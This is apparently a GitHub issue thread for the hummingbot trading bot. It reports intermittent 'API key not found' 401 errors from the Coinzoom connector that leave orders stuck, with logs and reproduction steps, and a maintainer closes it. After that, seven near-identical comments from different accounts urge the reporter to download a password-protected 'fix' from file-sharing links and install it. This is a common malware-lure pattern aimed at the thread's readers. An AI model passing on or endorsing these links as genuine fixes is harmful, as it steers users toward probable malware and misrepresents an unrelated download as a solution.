### ISSUE TITLE
Coinzoom - API key not found with status 401

### ISSUE THREAD

**Issue by RC-13** [hummingbot/hummingbot#4882]
**Describe the bug**
Opening ticket for tracking:
While inspecting the Coinzoom test bot, we notice that there are stuck orders left in the exchange. Upon checking the logs, the following error was seen which causes some of the orders to get stuck, although most of the time, the bot recover.
```python
2021-12-06 16:23:48,126 - 2871 - hummingbot.strategy.avellaneda_market_making.avellaneda_market_making - INFO - (BTC-USDT) Creating 1 bid orders at (Size, Price): ['0.0004 BTC, 47169.44 USDT']
2021-12-06 16:24:48,884 - 2871 - hummingbot.strategy.avellaneda_market_making.avellaneda_market_making - INFO - (BTC-USDT) Cancelling the limit order CZ_API_HBOTBBCUT1638807828126813. [clock=2021-12-06 16:24:48+00:00]
2021-12-06 16:25:06,753 - 2871 - hummingbot.connector.exchange.coinzoom.coinzoom_exchange - ERROR - {'error': 'API key not found', 'status': 401}
Traceback (most recent call last):
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_exchange.py", line 584, in _status_polling_loop
    await safe_gather(
  File "/home/ubuntu/coinzoom/hummingbot/core/utils/async_utils.py", line 22, in safe_gather
    return await asyncio.gather(*args, **kwargs)
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_exchange.py", line 652, in _update_order_status
    open_orders = await self._api_request("POST",
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_exchange.py", line 350, in _api_request
    parsed_response = await http_utils.api_call_with_retries(
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_http_utils.py", line 86, in api_call_with_retries
    return await api_call_with_retries(method=method, endpoint=endpoint, params=params,
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_http_utils.py", line 86, in api_call_with_retries
    return await api_call_with_retries(method=method, endpoint=endpoint, params=params,
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_http_utils.py", line 86, in api_call_with_retries
    return await api_call_with_retries(method=method, endpoint=endpoint, params=params,
  [Previous line repeated 1 more time]
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_http_utils.py", line 89, in api_call_with_retries
    raise CoinzoomAPIError({"error": parsed_response, "status": http_status})
hummingbot.connector.exchange.coinzoom.coinzoom_utils.CoinzoomAPIError: {'error': 'API key not found', 'status': 401}
2021-12-06 16:25:06,754 - 2871 - hummingbot.connector.exchange.coinzoom.coinzoom_exchange - NETWORK - Unexpected error while fetching account updates.
Traceback (most recent call last):
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_exchange.py", line 584, in _status_polling_loop
    await safe_gather(
  File "/home/ubuntu/coinzoom/hummingbot/core/utils/async_utils.py", line 22, in safe_gather
    return await asyncio.gather(*args, **kwargs)
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_exchange.py", line 652, in _update_order_status
    open_orders = await self._api_request("POST",
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_exchange.py", line 350, in _api_request
    parsed_response = await http_utils.api_call_with_retries(
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_http_utils.py", line 86, in api_call_with_retries
    return await api_call_with_retries(method=method, endpoint=endpoint, params=params,
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_http_utils.py", line 86, in api_call_with_retries
    return await api_call_with_retries(method=method, endpoint=endpoint, params=params,
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_http_utils.py", line 86, in api_call_with_retries
    return await api_call_with_retries(method=method, endpoint=endpoint, params=params,
  [Previous line repeated 1 more time]
  File "/home/ubuntu/coinzoom/hummingbot/connector/exchange/coinzoom/coinzoom_http_utils.py", line 89, in api_call_with_retries
    raise CoinzoomAPIError({"error": parsed_response, "status": http_status})
hummingbot.connector.exchange.coinzoom.coinzoom_utils.CoinzoomAPIError: {'error': 'API key not found', 'status': 401}
2021-12-06 16:25:06,843 - 2871 - hummingbot.connector.exchange.coinzoom.coinzoom_exchange - WARNING - Could not fetch account updates from coinzoom. Check API key and network connection.
2021-12-06 16:26:53,023 - 2871 - hummingbot.strategy.avellaneda_market_making.avellaneda_market_making - INFO - (BTC-USDT) Cancelling the limit order CZ_API_HBOTBBCUT1638807828126813. [clock=2021-12-06 16:26:48+00:00]
2021-12-06 16:27:02,162 - 2871 - hummingbot.core.event.event_reporter - EVENT_LOG - {"timestamp": 1638808020.0, "order_id": "CZ_API_HBOTBBCUT1638807828126813", "order_type": "OrderType.LIMIT_MAKER", "event_name": "MarketOrderFailureEvent", "event_source": "coinzoom"}
```
In the trace dump snippet, order `CZ_API_HBOTBBCUT1638807828126813` encounter the error during the cancellation process then after a few minutes, the bot was able to remove the order however in the exchange, the order remain active.
Note: Timestamp in the logs is in UTC while in the screenshot is in GMT+8
![image](https://user-images.githubusercontent.com/57189990/145127153-9eac1caa-7587-4d1a-9d64-3ba8366a5ae0.png)

**Steps To Reproduce**
Here are the steps to reproduce the issue (see attachments in the section below):
1. Setup an Avellaneda market-making strategy or a pure market-making strategy using Coinzoom.
2. Start the strategy and leave the bot running for a long duration.
3. Monitor the log pane from time to time.

Some other steps taken to try to replicate the error:
- Check that the API key did not expire: No expiration date for Coinzoom API generated keys
- Tried disconnecting the connection when an order is created or about to be cancelled: bot was able to recover the orders and cancelled properly.
...

**Screenshots**
![image](https://user-images.githubusercontent.com/57189990/145126897-8eb71915-c047-4d8e-86ae-b80087c6d2bf.png)

**Release version**
0.46.0

**Attachments**
[logs_btc-usdt_avellaneda_mm2021-12-05.log](https://github.com/CoinAlpha/hummingbot/files/7672478/logs_btc-usdt_avellaneda_mm2021-12-05.log)

**Optional: your discord username:**

**Comment by rapcmia** [comment]
The issue has been monitored for over 1 month and haven't seen it happen again. The bot worked as normal and this is most likely related to API error. Closing ticket for now.

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
